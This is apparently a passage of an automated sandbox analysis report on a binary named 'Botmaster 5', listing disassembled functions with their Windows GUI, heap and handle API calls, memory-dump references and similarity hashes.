                                                                                                                                                                                                                  • API ID: Window$Text$LengthLongMessageSendwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1755626507-0
                                                                                                                                                                                                                  • Opcode ID: d68669a6208e75c22bfcb5fa7e5916783efa29b201cf4cd54be669100fbd8263
                                                                                                                                                                                                                  • Instruction ID: d1323066734c194dbbdcab29f723ece19c258e021ff9e001b95878b9dd619dc8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d68669a6208e75c22bfcb5fa7e5916783efa29b201cf4cd54be669100fbd8263
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E901A231204221BEE7126B21FC84EAB77EDFF95328F50022AF81091066CB796C51DA6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042733F Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 0042725B: GlobalAlloc.KERNEL32(00000000,00000230,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0042729A
                                                                                                                                                                                                                    • Part of subcall function 0042725B: GlobalAlloc.KERNEL32(00000000,?), ref: 004272FC
                                                                                                                                                                                                                    • Part of subcall function 0042725B: memcpy.MSVCRT ref: 00427321
                                                                                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 00427375
                                                                                                                                                                                                                  • CreateIconFromResource.USER32(?,?,00000001,00030000), ref: 0042739D
                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004273B1
                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004273B4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Global$AllocCreateFreeFromIconResource$memcpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2888607074-0
                                                                                                                                                                                                                  • Opcode ID: 36ee2a0864abfc72a469da7c05461aab01cce3f03196f31d8bfb77a2bbc7404a
                                                                                                                                                                                                                  • Instruction ID: ba3946dc06ad85449ac66a3456a475309f193eac00b008a8e3e2852c37dfe8f4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36ee2a0864abfc72a469da7c05461aab01cce3f03196f31d8bfb77a2bbc7404a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC016D76301715ABD7219BB4ECC8F97B6EAEB88300F14442DF94596291D7B1EC01DB64
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420D62 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,00000000), ref: 00420D7B
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,00000000), ref: 00420D84
                                                                                                                                                                                                                    • Part of subcall function 00423BFB: EnterCriticalSection.KERNEL32(0046C2B8,?,?,0042363A,?), ref: 00423C03
                                                                                                                                                                                                                    • Part of subcall function 00423BFB: LeaveCriticalSection.KERNEL32(0046C2B8,?,?,0042363A,?), ref: 00423C3F
                                                                                                                                                                                                                    • Part of subcall function 00423B8E: EnterCriticalSection.KERNEL32(0046C2B8,?,?,?,0042364F,?), ref: 00423B99
                                                                                                                                                                                                                    • Part of subcall function 00423B8E: CreateSolidBrush.GDI32(?), ref: 00423BD9
                                                                                                                                                                                                                    • Part of subcall function 00423B8E: LeaveCriticalSection.KERNEL32(0046C2B8,?,?,0042364F,?), ref: 00423BED
                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00420DA2
                                                                                                                                                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000407), ref: 00420DB4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalSectionWindow$Long$EnterLeave$BrushCreateRedrawSolid
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1996939314-0
                                                                                                                                                                                                                  • Opcode ID: 8e01b1bdc5d2cf9b61f544b80e3231f77c4c69ee5adc828b7bb6fd54a4a0efaa
                                                                                                                                                                                                                  • Instruction ID: 7ee53a3bac25f192094348225c739bc5e35e615e546eaca5e77c9e809a818ae1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e01b1bdc5d2cf9b61f544b80e3231f77c4c69ee5adc828b7bb6fd54a4a0efaa
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36F096B5601218FFE6105FA4EC84C3B7BEDEF947A5750452EF18152161C3B56C01DA69
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004255B9 Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004255C3
                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 004255CE
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004255DB
                                                                                                                                                                                                                  • SetFocus.USER32(?), ref: 004255F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$EnabledFocusLongVisible
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 599048109-0
                                                                                                                                                                                                                  • Opcode ID: 74ed957cd538c9771cdc30bdf9dd55796936aa36690de664231f48a3d9a7fecc
                                                                                                                                                                                                                  • Instruction ID: c428943ac6c7280d81609cddb95c83266a9d2063ba1d2e27450790af057f50bc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74ed957cd538c9771cdc30bdf9dd55796936aa36690de664231f48a3d9a7fecc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F054713057115BD7209F26AC88A57B79CBB94B22784442AF559D2250D7B4EC40CB29
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041FC82 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(0046C2B8,?,?,?,0040107B,00000000,00001000,00000000,00000000), ref: 0041FC8C
                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0041FC94
                                                                                                                                                                                                                    • Part of subcall function 00427F4B: HeapAlloc.KERNEL32(00000008,00000020,?,?,0042774D,00000004,00000010,00427698,00401058,00000000,00001000,00000000,00000000), ref: 00427F5D
                                                                                                                                                                                                                    • Part of subcall function 00427F4B: HeapAlloc.KERNEL32(00000008,00000000,?,?,0042774D,00000004,00000010,00427698,00401058,00000000,00001000,00000000), ref: 00427F88
                                                                                                                                                                                                                    • Part of subcall function 00428040: HeapAlloc.KERNEL32(00000008,00000000,?,00427760,0000000C,00000000,004276F3,00000004,00000010,00427698,00401058,00000000,00001000,00000000,00000000), ref: 0042804D
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041FCD0
                                                                                                                                                                                                                  • InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 0041FCEA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocHeap$CommonControlsCriticalInitInitializeObjectSectionStockmemset
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3863164924-0
                                                                                                                                                                                                                  • Opcode ID: 3ce84261eaa50bb8add2abf77640d83d84b30d237690064848157e191d762ae2
                                                                                                                                                                                                                  • Instruction ID: d9e9b517c393071b7528d7ce29a5cb77052065e3659e9584051bf4d79ff5d942
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ce84261eaa50bb8add2abf77640d83d84b30d237690064848157e191d762ae2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F03671E803087ADB009BE0AD5BF9D7AA8A700708F50407BF641A61D1FAF99505875A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042372B Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00423737
                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00423758
                                                                                                                                                                                                                  • GetStockObject.GDI32(00000004), ref: 00423760
                                                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 0042376E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$BitmapCompatibleCreateFillRectSelectStock
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 601071620-0
                                                                                                                                                                                                                  • Opcode ID: a156b26f8745f1855e51481a0d2991f40d03222faaf3cf91811974263f0595fc
                                                                                                                                                                                                                  • Instruction ID: f4ab77a60cc04f5174372b757608d26b414035eff4de3ed1bc478aaa3bce26f0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a156b26f8745f1855e51481a0d2991f40d03222faaf3cf91811974263f0595fc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF05E75900208BFCF119F95DC08A9F7FBCFF84752F008125F91596250EBB19A10CB55
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004236E3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?,?,?,00420522,?), ref: 004236F4
                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,?,?,?,00420522,?), ref: 00423706
                                                                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?,?,?,00420522,?), ref: 00423712
                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,?,?,?,00420522,?), ref: 0042371F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ImageList_$MaskedRemove
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 842908640-0
                                                                                                                                                                                                                  • Opcode ID: 4df144741f1cb50df9614cf395c095638477197df679cd5a410b6d63d25bd62c
                                                                                                                                                                                                                  • Instruction ID: b92619ed9e4c994d80bfedfcfd4aeec3ddc83f9c0e189a624f46ce3554155bf8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4df144741f1cb50df9614cf395c095638477197df679cd5a410b6d63d25bd62c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F03072200214ABEB205B55DC80F16B7E9EB88771F208629F364921F0C7B5E8109F58
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F56A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0040F6E6,00000000,00000000,00000002,00000100,?,?,0040F6E6,?,?,00000000), ref: 0040F57F
                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?,0040F6E6,?,?,00000000), ref: 0040F584
                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,0040F6E6,?,?,00000000), ref: 0040F587
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0040F6E6,?,?,00000000), ref: 0040F594
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CurrentHandleProcess$CloseDuplicate
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1410216518-0
                                                                                                                                                                                                                  • Opcode ID: 60b0a1112ad16c72aa4bf727ebbc08dbdd593e709c467fc22fc96f201bcc68a0
                                                                                                                                                                                                                  • Instruction ID: 69f3b97180e859f1f77183a5762c55a6a881d4ac2f27b7f6d9c5353bd21d418d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60b0a1112ad16c72aa4bf727ebbc08dbdd593e709c467fc22fc96f201bcc68a0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BE09AB5A01215BBEB119BA5DC0AF9BBBACEB08750F100066F501E3294EBF1AD149B95
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004236A6 Relevance: 6.0, APIs: 4, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,00420712,?), ref: 004236B4
                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,00420712,?), ref: 004236BE
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,00420712,?), ref: 004236D1
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,00420712,?), ref: 004236DC
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DestroyFreeHeapImageList_
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2240856862-0
                                                                                                                                                                                                                  • Opcode ID: e7f3deb448b63278fe038e2c70bafaf5e4ccbd111a0f62ddd59046885538a61e
                                                                                                                                                                                                                  • Instruction ID: 91530e06f389fa7a1e92149d81c2793abd9bbb185be4bac4b33862b98622d10b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7f3deb448b63278fe038e2c70bafaf5e4ccbd111a0f62ddd59046885538a61e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEE09A76201654ABCA216B56EC04F4B7BB9EFD4710F164435E244A3270D6B1A811DE6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00422CD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,00000018), ref: 00422D15
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00422D38
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LongMessageSendWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3360111000-3916222277
                                                                                                                                                                                                                  • Opcode ID: d5fa3992d91a90ba01a7f064d5ce09bf9b1e0e2f3fe4809e6f962fe7280717d2
                                                                                                                                                                                                                  • Instruction ID: 213f2fb8838cb1a56d80d9e6de56e9aadbfce381b0723568f1ba9b33374800d4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5fa3992d91a90ba01a7f064d5ce09bf9b1e0e2f3fe4809e6f962fe7280717d2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC112F31B101156AEF208E49DD44ADEBBF5FB85350F54051AD841F32A0C7F8E857CB68
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004249EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetPropW.USER32(00000000,PB_ID), ref: 00424A07
                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F4), ref: 00424A14
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LongPropWindow
                                                                                                                                                                                                                  • String ID: PB_ID
                                                                                                                                                                                                                  • API String ID: 2492497586-4173770792
                                                                                                                                                                                                                  • Opcode ID: fcb5eb427adfee73893f83eca190f07b4e784594c9b37bbc481195cb306a2b52
                                                                                                                                                                                                                  • Instruction ID: 361b0baa9914aec2fd2d26f92a2d2e0a9545f827953e430b500b2633695dc7ed
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcb5eb427adfee73893f83eca190f07b4e784594c9b37bbc481195cb306a2b52
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F06D32640215ABCF104FA5EC08EAE3FAEFF84750F49402AF90893660DA75DC60DB9C
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425120 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetCursorPos.USER32(UB,?,00000000,0000000A,?,00425509,?,?,?), ref: 0042512D
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000214,?,00000010), ref: 00425150
